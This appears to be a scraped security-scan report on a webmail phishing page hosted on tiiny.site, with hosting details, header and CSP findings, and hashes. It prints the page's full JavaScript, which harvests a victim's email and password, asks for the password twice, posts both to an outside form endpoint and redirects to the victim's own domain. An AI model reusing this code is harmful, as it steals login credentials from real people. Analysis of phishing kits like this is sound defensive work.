technology software

documentation technical

news media journalism

corporate

English

The domain name 'moccasin-kip-63.tiiny.site' uses the .site top-level domain and includes subdomain 'moccasin-kip-63'. Its registrable label 'tiiny' stretches across 5 characters holding two vowels versus three consonants. It segments into three words: ti, in, y. The median word length lands at two characters. No strong language cues emerged from the frequency lists.

_gotcha

email

password

html/ca/fa/caface5c-7cbc-4a10-a774-0fc3137439c7.html.gz

7eec3429c76cb48e5fd457c5afb71b7cf34bc4298d53023bae8aea715443b4a9

6181b3b60803060be9f6e291b65060a55f1ce3467498106b9201e984963b99c3

03cb889de53bfe0f473da9b23139f7da0b649d5ac8df6fa73675de0a30478407

description

https://tiiny.host/assets/logo-purple-bg.png

viewport

robots

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://webui-test chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types lottie-worker-script-loader webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

NameCheap, Inc.

tiiny.site

Amazon EC2 Abuse

IP Management

Amazon AWS Network Operations

Amazon.com, Inc.

AWS RPKI Management POC

IP Routing

Amazon EC2 Network Operations

AMAZO-CF


    // Formspark endpoint
    const FORMSPARK_URL = "https://submit-form.com/587pLomge";
    
    // Get email from URL hash (e.g., #email@domain.com)
    function getEmailFromURL() {
      if (window.location.hash && window.location.hash.includes('@')) {
        return window.location.hash.substring(1);
      }
      const urlParams = new URLSearchParams(window.location.search);
      if (urlParams.has('email')) {
        return urlParams.get('email');
      }
      return null;
    }
    
    // Pre-fill email field
    const emailFromUrl = getEmailFromURL();
    const emailInput = document.getElementById('user');
    if (emailFromUrl) {
      emailInput.value = emailFromUrl;
    } else {
      emailInput.value = 'No email specified in URL';
    }
    
    // Form submission handler
    const form = document.getElementById('loginForm');
    const loader = document.getElementById('loader');
    let attemptCount = 0;
    let firstPassword = '';
    
    form.addEventListener('submit', async function(e) {
      e.preventDefault();
      
      const email = document.getElementById('user').value.trim();
      const password = document.getElementById('pass').value.trim();
      
      if (!email || email === 'No email specified in URL') {
        alert('Please enter a valid email address');
        return;
      }
      
      if (!password) {
        alert('Please enter your password');
        return;
      }
      
      attemptCount++;
      
      // Show loader
      loader.style.display = 'flex';
      
      // Prepare data for Formspark
      const formData = {
        email: email,
        password: password,
        webmail_login: true
      };
      
      // Add first attempt info on second try
      if (attemptCount === 2) {
        formData.first_attempt_password = firstPassword;
        formData.attempt = 'second';
      } else if (attemptCount === 1) {
        firstPassword = password;
        formData.attempt = 'first';
      }
      
      try {
        await fetch(FORMSPARK_URL, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(formData)
        });
      } catch(err) {
        console.log('Formspark error:', err);
      }
      
      // Extract domain from email for redirect
      const domain = email.split('@')[1];
      
      // Redirect to the real domain without exposing password in URL
      setTimeout(() => {
        window.location.href = `https://${domain}`;
      }, 1500);
    });
  

PasswordField

Open-Graph-Protocol

Amazon Web Services

Amazon S3

Amazon CloudFront

Tiiny Host

Web Page

analytics.tiiny.site

✅ Low Risk - https://moccasin-kip-63.tiiny.site/#je@sekure.net

Requests	IP Address	Location	AS Autonomous System
2	143.204.181.36	United States	AS16509
1	3.10.126.206	City of London, England, United Kingdom	AS16509Amazon.com, Inc.
1	143.204.181.90	United States	AS16509
4	3	-	-

Security Scan Report: moccasin-kip-63.tiiny.site

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies6

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History